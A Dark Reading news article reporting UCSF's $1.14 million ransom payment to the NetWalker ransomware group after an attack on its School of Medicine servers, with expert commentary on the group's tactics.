Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Attacks/Breaches

6/29/2020
05:30 PM
100%
0%

University of California SF Pays Ransom After Medical Servers Hit

As one of at least three universities hit in June, the school paid $1.14 million to cybercriminals following an attack on "several IT systems" in the UCSF School of Medicine.

The University of California San Francisco paid about $1.14 million to ransomware operators earlier this month after its malware compromised several important servers in the UCSF School of Medicine and encrypted them to prevent access, UCSF administrators stated on June 26.

The crypto-ransomware attacks, which have been attributed to the NetWalker group, also reportedly hit Michigan State University and Columbia College of Chicago. UCSF, which has pursued a substantial amount of research on coronavirus and COVID-19, stated that the attacks had not affected that research, nor had an impact on the operations of its medical center and patient care.

However, the ransomware had affected "a limited number of servers" in the medical school, the university said in a statement.

"The data that was encrypted is important to some of the academic work we pursue as a university serving the public good," the statement said. "We therefore made the difficult decision to pay some portion of the ransom, approximately $1.14 million, to the individuals behind the malware attack in exchange for a tool to unlock the encrypted data and the return of the data they obtained."

UCSF's information technology department caught the attack in progress and "quarantined several IT systems within the School of Medicine as a safety measure," preventing the attack from reaching the "core UCSF network," the university said in the June 26 statement.

The attack and its million-dollar consequences show that organizations must be able to recognize attacks and stop them much quicker, says Marcus Fowler, director of strategic threat at Darktrace, a threat protection firm.

"I think with ransomware, speed and visibility is going to be the key," he says. "They are running around and unplugging machines to manage the bleeding, rather than focusing on what happened."

NetWalker started attacking organization in 2019, focusing on large, global entities, according to cybersecurity firm SentinelOne. The group uses many generic system tools and tends to focus on so-called "living off the land" tactics, where the attackers try to only use utilities already present on the system to avoid being detected when installing malware, Jim Walter, a senior threat researcher at SentinelOne, wrote in a blog post on the group.

In February, the group attacked the Toll Group, an Australian shipping and logistics firm, causing disruptions to the company's operations and customers, according to media reports. In March 2020, the NetWalker group infected multiple hospitals in Spain, luring victims into opening malicious PDF documents that promised updated information on COVID-19. The latter incident, along with the attack on UCSF, highlights that cybercriminal groups — which had pledged to refrain from attacking hospitals and medical-research facilities during the coronavirus pandemic — cannot be trusted to forgo profits.

NetWalker, in particular, appears to be attacking with abandon — and leaking data, if the organization does not pay, Walter says.

"Consequently, detection and clean-up is no longer sufficient to ensure organizational data remains confidential and secure," he wrote in the blog post. "Prevention is the only the cure for threats like NetWalker, which hit organizations with the double-edged sword of encryption by ransomware and extortion via threats of public data exposure."

BBC News managed to get a fly-on-the-wall view of the negotiation between UCSF and the NetWalker criminal group — a negotiation that started at $3 million. After some back and forth, the two parties negotiated to 116.4 Bitcoins, or $1.14 million, which the school paid.

The school notified the FBI and are cooperating with their investigation. The university does not believe that any sensitive medical information had been exposed by the attack.

"Our investigation is ongoing but, at this time, we believe that the malware encrypted our servers opportunistically, with no particular area being targeted," USCF stated in its statement. "The attackers obtained some data as proof of their action, to use in their demand for a ransom payment."

The school declined to offer additional details, citing the ongoing federal investigation.

"In order to preserve the integrity of the investigation, we are limited in what we can share at this time and appreciate everyone's patience as we resolve this situation," UCSF said in its June 17 statement.

Related Content:

 
 
 
 
Learn from industry experts in a setting that is conducive to interaction and conversation about how to prepare for that "really bad day" in cybersecurity. Click for more information and to register for this On-Demand event. 
 
Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline ... View Full Bio
 

Recommended Reading:

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
RyanSepe
50%
50%
RyanSepe,
User Rank: Ninja
6/30/2020 | 11:01:20 PM
Facepalm
How many healthcare shops need to be burnt by the stove before they put in an effective backup process to prevent these types of incidents. Honestly at this point its just negligence.
COVID-19: Latest Security News & Commentary
Dark Reading Staff 8/3/2020
Pen Testers Who Got Arrested Doing Their Jobs Tell All
Kelly Jackson Higgins, Executive Editor at Dark Reading,  8/5/2020
New 'Nanodegree' Program Provides Hands-On Cybersecurity Training
Nicole Ferraro, Contributing Writer,  8/3/2020
Register for Dark Reading Newsletters
White Papers
Video
Cartoon Contest
Current Issue
Special Report: Computing's New Normal, a Dark Reading Perspective
This special report examines how IT security organizations have adapted to the "new normal" of computing and what the long-term effects will be. Read it and get a unique set of perspectives on issues ranging from new threats & vulnerabilities as a result of remote working to how enterprise security strategy will be affected long term.
Flash Poll
The Changing Face of Threat Intelligence
The Changing Face of Threat Intelligence
This special report takes a look at how enterprises are using threat intelligence, as well as emerging best practices for integrating threat intel into security operations and incident response. Download it today!
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2020-12777
PUBLISHED: 2020-08-10
A function in Combodo iTop contains a vulnerability of Broken Access Control, which allows unauthorized attacker to inject command and disclose system information.
CVE-2020-12778
PUBLISHED: 2020-08-10
Combodo iTop does not validate inputted parameters, attackers can inject malicious commands and launch XSS attack.
CVE-2020-12779
PUBLISHED: 2020-08-10
Combodo iTop contains a stored Cross-site Scripting vulnerability, which can be attacked by uploading file with malicious script.
CVE-2020-12780
PUBLISHED: 2020-08-10
A security misconfiguration exists in Combodo iTop, which can expose sensitive information.
CVE-2020-12781
PUBLISHED: 2020-08-10
Combodo iTop contains a cross-site request forgery (CSRF) vulnerability, attackers can execute specific commands via malicious site request forgery.